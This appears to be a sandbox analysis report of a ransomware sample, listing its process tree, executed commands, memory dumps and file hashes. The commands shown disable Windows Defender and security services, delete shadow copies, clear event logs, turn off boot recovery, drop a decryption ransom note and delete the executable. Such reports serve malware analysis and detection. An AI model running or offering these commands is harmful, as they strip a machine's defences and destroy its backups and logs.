PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1280 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1536 wrote to memory of 1084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/1720-54-0x0000000000000000-mapping.dmp

memory/652-55-0x0000000000000000-mapping.dmp

memory/560-56-0x0000000000000000-mapping.dmp

memory/708-57-0x0000000000000000-mapping.dmp

memory/632-58-0x0000000000000000-mapping.dmp

memory/816-59-0x0000000000000000-mapping.dmp

memory/1984-60-0x0000000000000000-mapping.dmp

memory/1120-61-0x0000000000000000-mapping.dmp

memory/384-62-0x0000000000000000-mapping.dmp

memory/960-63-0x0000000000000000-mapping.dmp

memory/1468-64-0x0000000000000000-mapping.dmp

memory/1116-65-0x0000000000000000-mapping.dmp

memory/820-66-0x0000000000000000-mapping.dmp

memory/1280-67-0x0000000000000000-mapping.dmp

memory/1536-68-0x0000000000000000-mapping.dmp

memory/1084-69-0x0000000000000000-mapping.dmp

memory/1108-70-0x0000000000000000-mapping.dmp

memory/1500-71-0x0000000000000000-mapping.dmp

memory/976-72-0x0000000000000000-mapping.dmp

memory/1320-73-0x0000000000000000-mapping.dmp

memory/1768-74-0x0000000000000000-mapping.dmp

memory/2016-75-0x0000000000000000-mapping.dmp

memory/1916-76-0x0000000000000000-mapping.dmp

memory/1528-77-0x0000000000000000-mapping.dmp

memory/1588-78-0x0000000000000000-mapping.dmp

memory/2024-79-0x0000000000000000-mapping.dmp

memory/1992-80-0x0000000000000000-mapping.dmp

memory/1600-81-0x0000000000000000-mapping.dmp

memory/280-82-0x0000000000000000-mapping.dmp

memory/1248-83-0x0000000000000000-mapping.dmp

memory/576-84-0x0000000000000000-mapping.dmp

memory/688-85-0x0000000000000000-mapping.dmp

memory/1092-86-0x0000000000000000-mapping.dmp

memory/1788-87-0x0000000000000000-mapping.dmp

memory/1116-88-0x0000000000000000-mapping.dmp

memory/1292-89-0x0000000000000000-mapping.dmp

memory/864-90-0x0000000000000000-mapping.dmp

memory/1816-91-0x0000000000000000-mapping.dmp

memory/992-92-0x0000000000000000-mapping.dmp

memory/1700-93-0x0000000000000000-mapping.dmp

memory/1764-94-0x0000000000000000-mapping.dmp

memory/1064-95-0x0000000000000000-mapping.dmp

memory/1888-96-0x0000000000000000-mapping.dmp

memory/1748-97-0x0000000000000000-mapping.dmp

memory/1712-98-0x0000000000000000-mapping.dmp

memory/952-99-0x0000000000000000-mapping.dmp

memory/884-100-0x0000000000000000-mapping.dmp

memory/816-101-0x0000000000000000-mapping.dmp

memory/740-102-0x0000000000000000-mapping.dmp

memory/956-103-0x0000000000000000-mapping.dmp

memory/1088-104-0x0000000000000000-mapping.dmp

memory/1524-105-0x0000000000000000-mapping.dmp

memory/1316-106-0x0000000000000000-mapping.dmp

memory/1736-107-0x0000000000000000-mapping.dmp

memory/1884-108-0x0000000000000000-mapping.dmp

memory/888-109-0x0000000000000000-mapping.dmp

memory/1704-110-0x0000000000000000-mapping.dmp

memory/1164-111-0x0000000000000000-mapping.dmp

memory/1124-112-0x0000000000000000-mapping.dmp

memory/1124-113-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp

memory/1964-114-0x0000000000000000-mapping.dmp

memory/1284-116-0x0000000000000000-mapping.dmp

memory/316-118-0x0000000000000000-mapping.dmp

memory/1052-119-0x0000000000000000-mapping.dmp

memory/1060-120-0x0000000000000000-mapping.dmp

memory/2092-122-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp

memory/2092-123-0x00000000025C0000-0x00000000025C2000-memory.dmp

memory/2092-124-0x00000000025C2000-0x00000000025C4000-memory.dmp

memory/2092-125-0x00000000025C4000-0x00000000025C7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 aea5a2d964838b8e28ee4017dba48ea8
SHA1 94e56266d78088b8f8bfbb3dbb98c0a5bb57172a
SHA256 9ebe034d15d89f89bc9267e873191944c30917f85aa105c825e4a865854023e7
SHA512 8ce1cf765b234b8c0ed557badc5466cfc90b4c25e29b10d8d9a026a58f30a8665935b424d4c8e3b91a0319f3f8cd039b9c60bda4d1ef305688a58344784abac4

memory/2176-128-0x000007FEF1D00000-0x000007FEF285D000-memory.dmp

memory/2176-130-0x0000000002790000-0x0000000002792000-memory.dmp

memory/2176-131-0x0000000002792000-0x0000000002794000-memory.dmp

memory/2092-129-0x00000000025CB000-0x00000000025EA000-memory.dmp

memory/2176-132-0x0000000002794000-0x0000000002797000-memory.dmp

memory/2176-133-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/2176-134-0x000000000279B000-0x00000000027BA000-memory.dmp

C:\vyS2_HOW_TO_DECRYPT.txt

MD5 ee121b1deb962e44600cf271791ebd82
SHA1 1c5b22c8856b15843ac236159b558e1fdca8dc04
SHA256 34ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512 f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a